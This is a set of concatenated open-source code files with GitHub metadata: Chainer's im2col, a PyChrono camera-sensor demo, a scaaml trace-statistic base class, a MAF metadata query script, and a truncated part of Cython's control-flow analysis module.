            (self.ph, self.pw), self.cover_all,
            (self.dy, self.dx)).apply(grad_outputs)
def im2col(x, ksize, stride=1, pad=0, cover_all=False, dilate=1):
    """Extract patches from an image based on the filter.

    This function rearranges patches of an image and puts them in the channel
    dimension of the output.

    Patches are extracted at positions shifted by multiples of ``stride`` from
    the first position ``-pad`` for each spatial axis.
    The right-most (or bottom-most) patches do not run over the padded spatial
    size.

    Notation: here is a notation.

    - :math:`n` is the batch size.
    - :math:`c` is the number of the input channels.
    - :math:`h` and :math:`w` are the height and width of the input image,
      respectively.
    - :math:`k_H` and :math:`k_W` are the height and width of the filters,
      respectively.
    - :math:`s_Y` and :math:`s_X` are the strides of the filter.
    - :math:`p_H` and :math:`p_W` are the spatial padding sizes.
    - :math:`d_Y` and :math:`d_X` are the dilation factors of filter \
      application.

    The output size :math:`(h_O, w_O)` is determined by the following
    equations when ``cover_all = False``:

    .. math::

       h_O &= (h + 2p_H - k_H - (k_H - 1) * (d_Y - 1)) / s_Y + 1,\\\\
       w_O &= (w + 2p_W - k_W - (k_W - 1) * (d_X - 1)) / s_X + 1.

    When ``cover_all = True``, the output size is determined by
    the following equations:

    .. math::

       h_O &= (h + 2p_H - k_H - (k_H - 1) * (d_Y - 1) + s_Y - 1) / s_Y + 1,\\\\
       w_O &= (w + 2p_W - k_W - (k_W - 1) * (d_X - 1) + s_X - 1) / s_X + 1.

    Args:
        x (:class:`~chainer.Variable` or :ref:`ndarray`):
            Input variable of shape :math:`(n, c, h, w)`.
        ksize (int or pair of ints): Size of filters (a.k.a. kernels).
            ``ksize=k`` and ``ksize=(k, k)`` are equivalent.
        stride (int or pair of ints): Stride of filter applications.
            ``stride=s`` and ``stride=(s, s)`` are equivalent.
        pad (int or pair of ints): Spatial padding width for input arrays.
            ``pad=p`` and ``pad=(p, p)`` are equivalent.
        cover_all (bool): If ``True``, all spatial locations are rearranged
            into some output pixels. It may make the output size larger.
        dilate (int or pair of ints): Dilation factor of filter applications.
            ``dilate=d`` and ``dilate=(d, d)`` are equivalent.

    Returns:
        ~chainer.Variable:
        Output variable whose shape is
        :math:`(n, c \\cdot k_H \\cdot k_W, h_O, w_O)`
    """
    # Thin public wrapper: all work happens in the Im2Col function node.
    return Im2Col(ksize, stride, pad, cover_all, dilate).apply((x,))[0]
| {
"content_hash": "81b42a0cd8b311ef3c99c9966ede4ce4",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 33.91975308641975,
"alnum_prop": 0.5670609645131938,
"repo_name": "wkentaro/chainer",
"id": "0f70f81914bd7adbfc285eab7168a3865748765a",
"size": "5495",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "chainer/functions/array/im2col.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3368"
},
{
"name": "C",
"bytes": "1231"
},
{
"name": "C++",
"bytes": "1662966"
},
{
"name": "CMake",
"bytes": "50912"
},
{
"name": "Cuda",
"bytes": "178765"
},
{
"name": "Dockerfile",
"bytes": "3316"
},
{
"name": "PowerShell",
"bytes": "7197"
},
{
"name": "Python",
"bytes": "6041757"
},
{
"name": "Shell",
"bytes": "41813"
}
],
"symlink_target": ""
} |
import pychrono.core as chrono
import pychrono.sensor as sens
import math
import time
def main():
    """Build a Chrono system with a camera orbiting an HMMWV chassis mesh.

    Creates the physical system and mesh body, attaches a camera sensor with
    a post-processing filter graph (noise -> visualize -> RGBA8 access ->
    save -> grayscale -> resize -> R8 access), then steps the simulation
    until `end_time`, printing buffer info each step.

    Reads its configuration (update_rate, image_width, noise_model, ...)
    from the module-level globals assigned at the bottom of this file; they
    are in scope because main() is only called after those assignments run.
    """
    # -----------------
    # Create the system
    # -----------------
    mphysicalSystem = chrono.ChSystemNSC()
    # -----------------------------------
    # add a mesh to be sensed by a camera
    # -----------------------------------
    mmesh = chrono.ChTriangleMeshConnected()
    mmesh.LoadWavefrontMesh(chrono.GetChronoDataFile(
        "vehicle/hmmwv/hmmwv_chassis.obj"), False, True)
    # scale to a different size
    mmesh.Transform(chrono.ChVectorD(0, 0, 0), chrono.ChMatrix33D(2))
    trimesh_shape = chrono.ChTriangleMeshShape()
    trimesh_shape.SetMesh(mmesh)
    trimesh_shape.SetName("HMMWV Chassis Mesh")
    trimesh_shape.SetMutable(False)
    # The mesh body is fixed; only the camera moves (orbit in the sim loop).
    mesh_body = chrono.ChBody()
    mesh_body.SetPos(chrono.ChVectorD(0, 0, 0))
    mesh_body.AddVisualShape(trimesh_shape)
    mesh_body.SetBodyFixed(True)
    mphysicalSystem.Add(mesh_body)
    # -----------------------
    # Create a sensor manager
    # -----------------------
    manager = sens.ChSensorManager(mphysicalSystem)
    intensity = 1.0
    manager.scene.AddPointLight(chrono.ChVectorF(2, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
    manager.scene.AddPointLight(chrono.ChVectorF(9, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
    manager.scene.AddPointLight(chrono.ChVectorF(16, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
    manager.scene.AddPointLight(chrono.ChVectorF(23, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
    # ------------------------------------------------
    # Create a camera and add it to the sensor manager
    # ------------------------------------------------
    offset_pose = chrono.ChFrameD(
        chrono.ChVectorD(-5, 0, 2), chrono.Q_from_AngAxis(2, chrono.ChVectorD(0, 1, 0)))
    cam = sens.ChCameraSensor(
        mesh_body,              # body camera is attached to
        update_rate,            # update rate in Hz
        offset_pose,            # offset pose
        image_width,            # image width
        image_height,           # image height
        fov                     # camera's horizontal field of view
    )
    cam.SetName("Camera Sensor")
    cam.SetLag(lag)
    cam.SetCollectionWindow(exposure_time)
    # ------------------------------------------------------------------
    # Create a filter graph for post-processing the data from the camera
    # ------------------------------------------------------------------
    if noise_model == "CONST_NORMAL":
        cam.PushFilter(sens.ChFilterCameraNoiseConstNormal(0.0, 0.02))
    elif noise_model == "PIXEL_DEPENDENT":
        cam.PushFilter(sens.ChFilterCameraNoisePixDep(0, 0.02, 0.03))
    elif noise_model == "NONE":
        # Don't add any noise models
        pass
    # Renders the image at current point in the filter graph
    if vis:
        cam.PushFilter(sens.ChFilterVisualize(
            image_width, image_height, "Before Grayscale Filter"))
    # Provides the host access to this RGBA8 buffer
    cam.PushFilter(sens.ChFilterRGBA8Access())
    # Save the current image to a png file at the specified path
    if save:
        cam.PushFilter(sens.ChFilterSave(out_dir + "rgb/"))
    # Filter the sensor to grayscale
    cam.PushFilter(sens.ChFilterGrayscale())
    # Render the buffer again to see the new grayscaled image
    if vis:
        cam.PushFilter(sens.ChFilterVisualize(
            int(image_width / 2), int(image_height / 2), "Grayscale Image"))
    # Save the grayscaled image at the specified path
    if save:
        cam.PushFilter(sens.ChFilterSave(out_dir + "gray/"))
    # Resizes the image to the provided width and height
    cam.PushFilter(sens.ChFilterImageResize(
        int(image_width / 2), int(image_height / 2)))
    # Access the grayscaled buffer as R8 pixels
    cam.PushFilter(sens.ChFilterR8Access())
    # add sensor to manager
    manager.AddSensor(cam)
    # ---------------
    # Simulate system
    # ---------------
    orbit_radius = 10
    orbit_rate = 0.5
    ch_time = 0.0
    t1 = time.time()
    while (ch_time < end_time):
        # Orbit the camera around the mesh at fixed radius and angular rate.
        cam.SetOffsetPose(chrono.ChFrameD(
            chrono.ChVectorD(-orbit_radius * math.cos(ch_time * orbit_rate),
                             -orbit_radius * math.sin(ch_time * orbit_rate), 1),
            chrono.Q_from_AngAxis(ch_time * orbit_rate, chrono.ChVectorD(0, 0, 1))))
        # Access the RGBA8 buffer from the camera
        rgba8_buffer = cam.GetMostRecentRGBA8Buffer()
        if (rgba8_buffer.HasData()):
            rgba8_data = rgba8_buffer.GetRGBA8Data()
            # (typo fixed: "recieved" -> "received")
            print('RGBA8 buffer received from cam. Camera resolution: {0}x{1}'
                  .format(rgba8_buffer.Width, rgba8_buffer.Height))
            print('First Pixel: {0}'.format(rgba8_data[0, 0, :]))
        # Update sensor manager
        # Will render/save/filter automatically
        manager.Update()
        # Perform step of dynamics
        mphysicalSystem.DoStepDynamics(step_size)
        # Get the current time of the simulation
        ch_time = mphysicalSystem.GetChTime()
    print("Sim time:", end_time, "Wall time:", time.time() - t1)
# -----------------
# Camera parameters
# -----------------
# NOTE: main() reads these module-level globals; they must all be assigned
# before the main() call at the bottom of this file.
# Noise model attached to the sensor
# TODO: Noise models haven't been implemented in python
# noise_model="CONST_NORMAL" # Gaussian noise with constant mean and standard deviation
# noise_model="PIXEL_DEPENDENT" # Pixel dependent gaussian noise
# noise_model="RESPONSE_FUNCTION" # Noise model based on camera's response and parameters
noise_model = "NONE" # No noise model
# Camera lens model
# Either CameraLensModelType_PINHOLE or CameraLensModelType_FOV_LENS
# NOTE(review): lens_model is defined but never referenced in this script.
lens_model = sens.CameraLensModelType_PINHOLE
# Update rate in Hz
update_rate = 30
# Image width and height
image_width = 1280
image_height = 720
# Camera's horizontal field of view (radians)
fov = 1.408
# Lag (in seconds) between sensing and when data becomes accessible
lag = 0
# Exposure (in seconds) of each image
exposure_time = 0
# ---------------------
# Simulation parameters
# ---------------------
# Simulation step size
step_size = 1e-3
# Simulation end time
end_time = 20.0
# Save camera images
save = False
# Render camera images
vis = True
# Output directory
out_dir = "SENSOR_OUTPUT/"
# The path to the Chrono data directory containing various assets (meshes, textures, data files)
# is automatically set, relative to the default location of this demo.
# If running from a different directory, you must change the path to the data directory with:
# chrono.SetChronoDataPath('path/to/data')
main()
| {
"content_hash": "60b201dd928a606d688f573b1dc325a4",
"timestamp": "",
"source": "github",
"line_count": 198,
"max_line_length": 119,
"avg_line_length": 33.87373737373738,
"alnum_prop": 0.6183092291635605,
"repo_name": "projectchrono/chrono",
"id": "38394a3fe06b25af569c4f4cae3f73a5326bac7f",
"size": "7474",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "src/demos/python/sensor/demo_SEN_camera.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7614"
},
{
"name": "C",
"bytes": "2409870"
},
{
"name": "C++",
"bytes": "26511084"
},
{
"name": "CMake",
"bytes": "645492"
},
{
"name": "CSS",
"bytes": "170326"
},
{
"name": "Cuda",
"bytes": "1226094"
},
{
"name": "Dockerfile",
"bytes": "3279"
},
{
"name": "GLSL",
"bytes": "4925"
},
{
"name": "HTML",
"bytes": "7922"
},
{
"name": "Inno Setup",
"bytes": "24125"
},
{
"name": "JavaScript",
"bytes": "4731"
},
{
"name": "Lex",
"bytes": "3433"
},
{
"name": "Lua",
"bytes": "651"
},
{
"name": "POV-Ray SDL",
"bytes": "25421"
},
{
"name": "PowerShell",
"bytes": "142"
},
{
"name": "Python",
"bytes": "645743"
},
{
"name": "SWIG",
"bytes": "317316"
},
{
"name": "Shell",
"bytes": "4827"
}
],
"symlink_target": ""
} |
"""Compute a statistic of many traces."""
from abc import ABC, abstractmethod
import numpy as np
class AbstractTraceStatistic(ABC):
    """Abstract accumulator for a statistic computed across many traces.

    Typical usage:
        stats = SomeConcreteStatistic()
        for example in ExampleIterator(ds_path):
            stats.update(example['trace1'])
        print(stats.result())
    """

    def __init__(self) -> None:
        """Initialize an empty statistic accumulator."""

    @abstractmethod
    def update(self, trace: np.ndarray) -> None:
        """Fold a single trace into the running statistic.

        Args:
            trace: One-dimensional numpy array of floats.
        """

    @abstractmethod
    def result(self):
        """Return the value of the accumulated statistic."""
| {
"content_hash": "ad6d88aa8c5439eb6c53d3bc530eb499",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 58,
"avg_line_length": 23.838709677419356,
"alnum_prop": 0.618403247631935,
"repo_name": "google/scaaml",
"id": "cdda994df89a09b131a137c8d5f850fbb637cbfc",
"size": "1314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scaaml/stats/trace_statistic_base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "75551"
},
{
"name": "Python",
"bytes": "386750"
},
{
"name": "Shell",
"bytes": "723"
}
],
"symlink_target": ""
} |
"""Script to parse MAF file
"""
from bigquery_etl.utils.gcutils import read_mysql_query
import sys
import json
import re
from pandas import ExcelWriter
# Module-level Excel writer: identify_data() dumps the filtered metadata
# table into 'maf.xlsx' through this handle and saves it.
writer = ExcelWriter('maf.xlsx')
def identify_data(config):
    """Query CloudSQL for MAF-file metadata and return it as a DataFrame.
    Also writes the filtered table to the module-level 'maf.xlsx' writer.
    NOTE: this module is Python 2 (print statements).
    Args:
        config: dict loaded from the JSON config file; must provide
            'cloudsql' connection params and config['mirna']['mirna'].
    """
    # cloudSql connection params
    host = config['cloudsql']['host']
    database = config['cloudsql']['db']
    user = config['cloudsql']['user']
    passwd = config['cloudsql']['passwd']
    # sqlquery = """
    # SELECT ParticipantBarcode, SampleBarcode, AliquotBarcode, Pipeline, Platform,
    # SampleType, SampleTypeCode, Study, DatafileName, DatafileNameKey, Datatype,
    # DatafileUploaded, IncludeForAnalysis, DataCenterName
    # FROM metadata_data
    # WHERE DatafileUploaded='true'
    # AND DatafileNameKey LIKE '%.maf'
    # AND IncludeForAnalysis='yes'
    # """
    sqlquery = """
        SELECT ParticipantBarcode, SampleBarcode, AliquotBarcode, Pipeline, Platform,
            SampleType, SampleTypeCode, Study, DatafileName, DatafileNameKey, Datatype,
            DatafileUploaded, IncludeForAnalysis, DataCenterName
        FROM metadata_data
        WHERE Datatype='Mutations'
        AND DatafileNameKey LIKE '%.maf'
        AND DatafileUploaded='true'
        AND IncludeForAnalysis='yes'
    """
    #sqlquery = """ select datafilename, datafilenamekey from metadata_data where 0 < instr(datafilename, 'maf') and 'true' = datafileuploaded and 0 = instr(datafilename, 'protected') group by datafilename, dataarchivename;
    #"""
    # connect to db and get results in a dataframe
    metadata_df = read_mysql_query(host, database, user, passwd, sqlquery)
    # print metadata_df
    for i, x in metadata_df.iterrows():
        print x.to_dict()
    # print metadata_df
    # NOTE(review): this unconditional sys.exit() makes everything below
    # unreachable -- looks like leftover debugging; confirm before shipping.
    sys.exit()
    # rename platforms in rows
    for i, row in metadata_df.iterrows():
        metadata = row.to_dict()
        metadata_df.loc[i, 'OutDatafileNameKey'] = config['mirna']['mirna']['output_dir']\
            + metadata['DatafileName'] + '.json'
    #metadata_df.loc[:, 'SampleTypeLetterCode'] = metadata_df['SampleTypeCode']\
    #    .map(lambda code: config['sample_code2letter'][code])
    # Strip any leading '/' from the object key.
    metadata_df.loc[:, 'DatafileNameKey'] = metadata_df['DatafileNameKey']\
        .map(lambda inputfile: re.sub(r"^/", "", inputfile))
    # tag CELLC samples
    metadata_df['transform_function'] = 'mirna.mirna.transform.parse_mirna'
    print "Found {0} rows, columns." .format(str(metadata_df.shape))
    # Filter - check all "is_" fields - remember all 'is_' fields must be boolean
    all_flag_columns = [key for key in metadata_df.columns.values if key.startswith("is_")]
    flag_df = metadata_df[all_flag_columns]
    metadata_df = metadata_df[flag_df.all(axis=1)]
    metadata_df.to_excel(writer, 'maf_files_metadata_table')
    writer.save()
    print "After filtering: Found {0} rows, columns." .format(str(metadata_df.shape))
    return metadata_df
if __name__ == '__main__':
    # Entry point: first CLI argument is the path to the JSON config file.
    print identify_data(json.load(open(sys.argv[1])))
| {
"content_hash": "46dcb3c546e8cbca2007e466c6bef86a",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 223,
"avg_line_length": 40.43589743589744,
"alnum_prop": 0.6433100824350032,
"repo_name": "isb-cgc/ISB-CGC-data-proc",
"id": "88e8fe1549f7ea49a07c35c008577801a0bb2000",
"size": "3767",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tcga_etl_pipeline/maf/part1/extract2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "6576"
},
{
"name": "Python",
"bytes": "1169886"
},
{
"name": "Shell",
"bytes": "1068"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import cython
cython.declare(PyrexTypes=object, ExprNodes=object, Nodes=object,
Builtin=object, InternalError=object, error=object, warning=object,
py_object_type=object, unspecified_type=object,
object_expr=object, fake_rhs_expr=object, TypedExprNode=object)
from . import Builtin
from . import ExprNodes
from . import Nodes
from . import Options
from .PyrexTypes import py_object_type, unspecified_type
from . import PyrexTypes
from .Visitor import TreeVisitor, CythonTransform
from .Errors import error, warning, InternalError
from .Optimize import ConstantFolding
class TypedExprNode(ExprNodes.ExprNode):
    """Stand-in expression node carrying an explicit type.

    Used to record assignments of a known type when no real entry exists
    (e.g. implicit *args / **kwargs bindings).
    """

    def __init__(self, type, may_be_none=None, pos=None):
        super(TypedExprNode, self).__init__(pos)
        self.type = type
        self._may_be_none = may_be_none

    def may_be_none(self):
        # Anything other than an explicit False counts as "might be None".
        return not (self._may_be_none == False)
# Generic Python-object expression, used as the default rhs in mark_assignment.
object_expr = TypedExprNode(py_object_type, may_be_none=True)
# Fake rhs to silence "unused variable" warning
fake_rhs_expr = TypedExprNode(unspecified_type)
class ControlBlock(object):
    """Node of the control flow graph.

    Holds the assignments and name references of one straight-line region
    of code, plus its CFG connectivity.

    children   set of successor blocks
    parents    set of predecessor blocks
    positions  set of source position markers
    stats      list of block statements
    gen        dict of assignments generated by this block
    bounded    set of entries that are definitely bound in this block

    Example:
        a = 1
        b = a + c # 'c' is already bounded or exception here
        stats = [Assignment(a), NameReference(a), NameReference(c),
                 Assignment(b)]
        gen = {Entry(a): Assignment(a), Entry(b): Assignment(b)}
        bounded = set([Entry(a), Entry(c)])
    """

    def __init__(self):
        self.children = set()
        self.parents = set()
        self.positions = set()
        self.stats = []
        self.gen = {}
        self.bounded = set()
        # Bit vectors driving the reaching-definitions fixpoint iteration.
        self.i_input = 0
        self.i_output = 0
        self.i_gen = 0
        self.i_kill = 0
        self.i_state = 0

    def empty(self):
        # A block is empty when it records no statements and no positions.
        return not self.stats and not self.positions

    def detach(self):
        """Unlink this block from all of its parents and children."""
        for succ in self.children:
            succ.parents.remove(self)
        for pred in self.parents:
            pred.children.remove(self)
        self.parents.clear()
        self.children.clear()

    def add_child(self, block):
        # Maintain both directions of the parent/child relation.
        self.children.add(block)
        block.parents.add(self)
class ExitBlock(ControlBlock):
    """Exit-point block: reports itself as non-empty so that graph
    normalization never splices it out."""

    def empty(self):
        return False
class AssignmentList(object):
    """Per-entry list of assignment statements; `bit` and `mask` are
    attached later by ControlFlow.initialize()."""

    def __init__(self):
        self.stats = []
class ControlFlow(object):
    """Control-flow graph.

    entry_point  ControlBlock  entry point for this graph
    exit_point   ControlBlock  normal exit point
    block        ControlBlock  current block
    blocks       set           children nodes
    entries      set           tracked entries
    loops        list          stack for loop descriptors
    exceptions   list          stack for exception descriptors
    """
    def __init__(self):
        self.blocks = set()
        self.entries = set()
        self.loops = []
        self.exceptions = []
        # Distinguished entry/exit blocks; the exit is an ExitBlock so that
        # normalize() never removes it as "empty".
        self.entry_point = ControlBlock()
        self.exit_point = ExitBlock()
        self.blocks.add(self.exit_point)
        self.block = self.entry_point
    def newblock(self, parent=None):
        """Create a block linked to `parent` if given.
        The block IS added to self.blocks (the historical note claiming
        otherwise was stale), but it does NOT become the current block --
        unlike nextblock().
        """
        block = ControlBlock()
        self.blocks.add(block)
        if parent:
            parent.add_child(block)
        return block
    def nextblock(self, parent=None):
        """Create a block linked to `parent` (or to the current block) and
        make it the new current block.
        NOTE: Block is added to self.blocks
        """
        block = ControlBlock()
        self.blocks.add(block)
        if parent:
            parent.add_child(block)
        elif self.block:
            self.block.add_child(block)
        self.block = block
        return self.block
    def is_tracked(self, entry):
        # Only entries whose lifetime can be reasoned about locally.
        if entry.is_anonymous:
            return False
        return (entry.is_local or entry.is_pyclass_attr or entry.is_arg or
                entry.from_closure or entry.in_closure or
                entry.error_on_uninitialized)
    def is_statically_assigned(self, entry):
        if (entry.is_local and entry.is_variable and
                (entry.type.is_struct_or_union or
                 entry.type.is_complex or
                 entry.type.is_array or
                 entry.type.is_cpp_class)):
            # stack allocated structured variable => never uninitialised
            return True
        return False
    def mark_position(self, node):
        """Mark position, will be used to draw graph nodes."""
        if self.block:
            self.block.positions.add(node.pos[:2])
    def mark_assignment(self, lhs, rhs, entry):
        # Record an assignment; gen keeps only the last assignment per entry.
        if self.block and self.is_tracked(entry):
            assignment = NameAssignment(lhs, rhs, entry)
            self.block.stats.append(assignment)
            self.block.gen[entry] = assignment
            self.entries.add(entry)
    def mark_argument(self, lhs, rhs, entry):
        if self.block and self.is_tracked(entry):
            assignment = Argument(lhs, rhs, entry)
            self.block.stats.append(assignment)
            self.block.gen[entry] = assignment
            self.entries.add(entry)
    def mark_deletion(self, node, entry):
        # After 'del', the entry is flagged uninitialised again (gen maps
        # the entry to the Uninitialized sentinel rather than a statement).
        if self.block and self.is_tracked(entry):
            assignment = NameDeletion(node, entry)
            self.block.stats.append(assignment)
            self.block.gen[entry] = Uninitialized
            self.entries.add(entry)
    def mark_reference(self, node, entry):
        if self.block and self.is_tracked(entry):
            self.block.stats.append(NameReference(node, entry))
            ## XXX: We don't track expression evaluation order so we can't use
            ## XXX: successful reference as initialization sign.
            ## # Local variable is definitely bound after this reference
            ## if not node.allow_null:
            ## self.block.bounded.add(entry)
            self.entries.add(entry)
    def normalize(self):
        """Delete unreachable and orphan blocks."""
        # Reachability sweep from the entry point.
        queue = set([self.entry_point])
        visited = set()
        while queue:
            root = queue.pop()
            visited.add(root)
            for child in root.children:
                if child not in visited:
                    queue.add(child)
        unreachable = self.blocks - visited
        for block in unreachable:
            block.detach()
        visited.remove(self.entry_point)
        for block in visited:
            if block.empty():
                # Splice empty blocks out, reconnecting parents to children.
                for parent in block.parents: # Re-parent
                    for child in block.children:
                        parent.add_child(child)
                block.detach()
                unreachable.add(block)
        self.blocks -= unreachable
    def initialize(self):
        """Set initial state, map assignments to bits."""
        self.assmts = {}
        # One AssignmentList per entry: `bit` marks the "uninitialised"
        # state; `mask` accumulates all bits belonging to that entry.
        bit = 1
        for entry in self.entries:
            assmts = AssignmentList()
            assmts.mask = assmts.bit = bit
            self.assmts[entry] = assmts
            bit <<= 1
        # Every assignment statement gets its own unique bit.
        for block in self.blocks:
            for stat in block.stats:
                if isinstance(stat, NameAssignment):
                    stat.bit = bit
                    assmts = self.assmts[stat.entry]
                    assmts.stats.append(stat)
                    assmts.mask |= bit
                    bit <<= 1
        # Per-block gen/kill sets from the last assignment per entry.
        for block in self.blocks:
            for entry, stat in block.gen.items():
                assmts = self.assmts[entry]
                if stat is Uninitialized:
                    block.i_gen |= assmts.bit
                else:
                    block.i_gen |= stat.bit
                block.i_kill |= assmts.mask
            block.i_output = block.i_gen
            for entry in block.bounded:
                block.i_kill |= self.assmts[entry].bit
        # At the entry point every entry starts in the "uninitialised" state.
        for assmts in self.assmts.values():
            self.entry_point.i_gen |= assmts.bit
        self.entry_point.i_output = self.entry_point.i_gen
    def map_one(self, istate, entry):
        # Decode the bit-vector `istate` into the set of assignments (or
        # sentinel states) reaching this point for `entry`.
        ret = set()
        assmts = self.assmts[entry]
        if istate & assmts.bit:
            if self.is_statically_assigned(entry):
                ret.add(StaticAssignment(entry))
            elif entry.from_closure:
                ret.add(Unknown)
            else:
                ret.add(Uninitialized)
        for assmt in assmts.stats:
            if istate & assmt.bit:
                ret.add(assmt)
        return ret
    def reaching_definitions(self):
        """Per-block reaching definitions analysis."""
        # Standard iterative dataflow: a block's input is the union of its
        # parents' outputs; iterate to a fixed point.
        dirty = True
        while dirty:
            dirty = False
            for block in self.blocks:
                i_input = 0
                for parent in block.parents:
                    i_input |= parent.i_output
                i_output = (i_input & ~block.i_kill) | block.i_gen
                if i_output != block.i_output:
                    dirty = True
                block.i_input = i_input
                block.i_output = i_output
class LoopDescr(object):
    """Bookkeeping for one active loop: the block following the loop
    (`next_block`), the loop body block (`loop_block`), and the exception
    descriptors pushed while inside it."""

    def __init__(self, next_block, loop_block):
        self.next_block = next_block
        self.loop_block = loop_block
        self.exceptions = []
class ExceptionDescr(object):
    """Descriptor of one active exception handler.

    entry_point    -- block entered when an exception is raised
    finally_enter  -- normal-path entry block of the finally clause (optional)
    finally_exit   -- normal-path exit block of the finally clause (optional)
    """

    def __init__(self, entry_point, finally_enter=None, finally_exit=None):
        self.entry_point = entry_point
        self.finally_enter = finally_enter
        self.finally_exit = finally_exit
class NameAssignment(object):
    """One assignment of `rhs` to the name `lhs` bound to `entry`."""

    def __init__(self, lhs, rhs, entry):
        # Lazily create the lhs node's control-flow state set.
        if lhs.cf_state is None:
            lhs.cf_state = set()
        self.lhs = lhs
        self.rhs = rhs
        self.entry = entry
        self.pos = lhs.pos
        self.refs = set()          # NameReferences that read this assignment
        self.is_arg = False
        self.is_deletion = False
        self.inferred_type = None

    def __repr__(self):
        return '%s(entry=%r)' % (type(self).__name__, self.entry)

    def infer_type(self):
        self.inferred_type = self.rhs.infer_type(self.entry.scope)
        return self.inferred_type

    def type_dependencies(self):
        return self.rhs.type_dependencies(self.entry.scope)

    @property
    def type(self):
        # Prefer the declared type; fall back to the inferred one.
        return (self.inferred_type if self.entry.type.is_unspecified
                else self.entry.type)

    def __getstate__(self):
        return (self.lhs, self.rhs, self.entry, self.pos,
                self.refs, self.is_arg, self.is_deletion, self.inferred_type)

    def __setstate__(self, state):
        (self.lhs, self.rhs, self.entry, self.pos,
         self.refs, self.is_arg, self.is_deletion, self.inferred_type) = state
class StaticAssignment(NameAssignment):
    """Assignment that happens at declaration time, e.g. stack allocation."""

    def __init__(self, entry):
        # Non-Python stack values can never be None; for Python objects we
        # simply do not know.
        may_be_none = False if not entry.type.is_pyobject else None
        lhs = TypedExprNode(
            entry.type, may_be_none=may_be_none, pos=entry.pos)
        super(StaticAssignment, self).__init__(lhs, lhs, entry)

    def infer_type(self):
        # The type is fixed by the declaration.
        return self.entry.type

    def type_dependencies(self):
        return ()
class Argument(NameAssignment):
    """Assignment produced by binding a function argument."""

    def __init__(self, lhs, rhs, entry):
        super(Argument, self).__init__(lhs, rhs, entry)
        self.is_arg = True
class NameDeletion(NameAssignment):
    """Records a `del name` statement (lhs doubles as rhs)."""

    def __init__(self, lhs, entry):
        super(NameDeletion, self).__init__(lhs, lhs, entry)
        self.is_deletion = True

    def infer_type(self):
        inferred = self.rhs.infer_type(self.entry.scope)
        if (not inferred.is_pyobject and
                inferred.can_coerce_to_pyobject(self.entry.scope)):
            # Coercible C value: treat as a generic Python object, without
            # caching it in self.inferred_type (mirrors original behaviour).
            return py_object_type
        self.inferred_type = inferred
        return inferred
class Uninitialized(object):
    """Sentinel state: the entry is definitely not initialised yet."""
class Unknown(object):
    """Sentinel state: value comes from an outer closure, so it might or
    might not be initialised."""
class NameReference(object):
    """Records a read of `entry` at the source position of `node`."""

    def __init__(self, node, entry):
        # Lazily create the node's control-flow state set.
        if node.cf_state is None:
            node.cf_state = set()
        self.node = node
        self.entry = entry
        self.pos = node.pos

    def __repr__(self):
        return '%s(entry=%r)' % (type(self).__name__, self.entry)
class ControlFlowState(list):
    """Reaching assignments for one node, plus derived nullability flags.

    cf_is_null     -- the entry is definitely uninitialised here
    cf_maybe_null  -- the entry may be uninitialised here
    is_single      -- exactly one assignment reaches this point
    """
    cf_maybe_null = False
    cf_is_null = False
    is_single = False

    def __init__(self, state):
        if Uninitialized in state:
            state.discard(Uninitialized)
            self.cf_maybe_null = True
            if not state:
                self.cf_is_null = True
        elif Unknown in state:
            # Closure-provided value: we cannot tell either way.
            state.discard(Unknown)
            self.cf_maybe_null = True
        elif len(state) == 1:
            self.is_single = True
        # Assignments of fake_rhs_expr are bookkeeping only; drop them here.
        super(ControlFlowState, self).__init__(
            assmt for assmt in state if assmt.rhs is not fake_rhs_expr)

    def one(self):
        # Only meaningful when is_single holds.
        return self[0]
class GVContext(object):
    """Shared state for rendering flow graphs as Graphviz subgraphs:
    stable node ids, cached source lines, and DOT escaping."""

    def __init__(self):
        self.blockids = {}
        self.nextid = 0
        self.children = []
        self.sources = {}

    def add(self, child):
        self.children.append(child)

    def nodeid(self, block):
        # Assign ids lazily, in first-seen order.
        ident = self.blockids.get(block)
        if ident is None:
            ident = 'block%d' % self.nextid
            self.blockids[block] = ident
            self.nextid += 1
        return ident

    def extract_sources(self, block):
        """Return the stripped source lines covered by `block`, joined by
        literal '\\n' sequences for use in a DOT label."""
        if not block.positions:
            return ''
        first = min(block.positions)
        last = max(block.positions)
        descr = first[0]
        if descr not in self.sources:
            # Cache each source file's lines on first access.
            self.sources[descr] = list(descr.get_lines())
        lines = self.sources[descr]
        return '\\n'.join(line.strip() for line in lines[first[1] - 1:last[1]])

    def render(self, fp, name, annotate_defs=False):
        """Render graphviz dot graph"""
        fp.write('digraph %s {\n' % name)
        fp.write(' node [shape=box];\n')
        for child in self.children:
            child.render(fp, self, annotate_defs)
        fp.write('}\n')

    def escape(self, text):
        # Escape for inclusion inside a double-quoted DOT label.
        return text.replace('"', '\\"').replace('\n', '\\n')
class GV(object):
    """Graphviz DOT renderer for a single function's control flow graph."""
    def __init__(self, name, flow):
        self.name = name
        self.flow = flow
    def render(self, fp, ctx, annotate_defs=False):
        """Write this flow graph as a DOT subgraph into `fp`.
        `ctx` is the shared GVContext providing node ids, cached source
        extraction and label escaping.  With `annotate_defs`, each
        assignment/deletion/reference is appended to the node label.
        """
        fp.write(' subgraph %s {\n' % self.name)
        for block in self.flow.blocks:
            label = ctx.extract_sources(block)
            if annotate_defs:
                for stat in block.stats:
                    if isinstance(stat, NameAssignment):
                        label += '\n %s [%s %s]' % (
                            stat.entry.name, 'deletion' if stat.is_deletion else 'definition', stat.pos[1])
                    elif isinstance(stat, NameReference):
                        if stat.entry:
